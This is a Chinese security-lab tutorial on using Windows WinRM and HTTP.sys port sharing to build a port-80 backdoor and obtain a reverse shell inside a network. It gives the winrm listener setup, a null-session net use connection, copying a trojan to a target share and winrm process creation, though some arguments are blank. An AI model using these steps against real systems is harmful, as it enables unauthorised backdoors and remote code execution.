内网 linux 反弹shell,安全实验室 | 内网渗透—利用WinRM实现端口复用&反弹SHELL

WinRM(Windows Remote Management)是Windows远程管理的简称,WinRM基于Web服务管理(WS-Management)标准,使用80和443端口,可以在对方开启防火墙的情况下远程管理目标机。在Windows Server 2008 R2以上的系统中都默认开启该服务。如果防御者配置不当,攻击者在内网渗透中很可能会利用WinRM实现端口复用,进而实现内网无文件攻击反弹shell。本期美创安全实验室将给大家介绍相关攻击原理及方法。

Part 1、WinRM端口复用原理

使用Windows的远程管理服务WinRM可以实现端口复用,结合HTTP.sys驱动自带的端口复用功能,一起实现正向的端口复用后门。

HTTP.sys驱动是IIS的主要组成部分,主要负责HTTP协议相关的处理,他有一个重要的功能是端口共享(Port Sharing)。所有基于HTTP.sys驱动的HTTP应用都可以共享同一个端口,只需要各自注册的URL前缀不相同即可。

而WinRM就是在HTTP.sys上注册了wsman的URL前缀,默认监听在5985端口。因此,在安装了IIS的Windows服务器上,开启WinRM服务后修改默认监听端口为80即可实现端口复用,通过Web端口登录Windows服务器。使用netsh http show servicestate命令可以查看所有在HTTP.sys驱动上注册过的URL前缀。

内网 linux 反弹shell,安全实验室 | 内网渗透—利用WinRM实现端口复用&反弹SHELL_第1张图片

Part 2、端口复用配置

对于Windows Server 2008以上的系统中,WinRM服务默认启动并监听在5985端口上。如果服务器本来就监听了80和5985端口,则我们既需要保留原本的5985监听端口,同时需要新增Winrm监听的80端口。这样的话,WinRM同时监听80和5985端口。这样既能保证原来的5985端口管理员可以正常使用,我们也能通过80端口远程连接WinRM。

通过下面的命令,可以新增WinRM一个80端口的监听。

Winrm set winrm/config/service

@{EnableCompatibilityHttpLinstener=”true”}

内网 linux 反弹shell,安全实验室 | 内网渗透—利用WinRM实现端口复用&反弹SHELL_第2张图片

可以看到80和5985都在监听。

内网 linux 反弹shell,安全实验室 | 内网渗透—利用WinRM实现端口复用&反弹SHELL_第3张图片

Part 3、WinRM实现反弹SHELL

目标机:192.168.210.102(Win 7)

跳板机:192.168.20.35(Win10)

攻击机:192.168.210.38(KaliLinux)

1)在跳板机上运行winrm

命令:winrm quickconfig

内网 linux 反弹shell,安全实验室 | 内网渗透—利用WinRM实现端口复用&反弹SHELL_第4张图片

2)在跳板机上使用net use连接目标机

命令·:net use \\192.168.210.102\ipc$ “” /user:””

内网 linux 反弹shell,安全实验室 | 内网渗透—利用WinRM实现端口复用&反弹SHELL_第5张图片

3)将木马放置在目标机中的共享文件夹下

命令:copy \\\

内网 linux 反弹shell,安全实验室 | 内网渗透—利用WinRM实现端口复用&反弹SHELL_第6张图片

4)利用跳板机内的WinRM实现无文件攻击反弹shell

命令:winrm invoke createwmicimv2/win32_process

@{commandline="\\\\"}

内网 linux 反弹shell,安全实验室 | 内网渗透—利用WinRM实现端口复用&反弹SHELL_第7张图片

攻击机成功监听到反弹shell

内网 linux 反弹shell,安全实验室 | 内网渗透—利用WinRM实现端口复用&反弹SHELL_第8张图片

你可能感兴趣的:(内网,linux,反弹shell)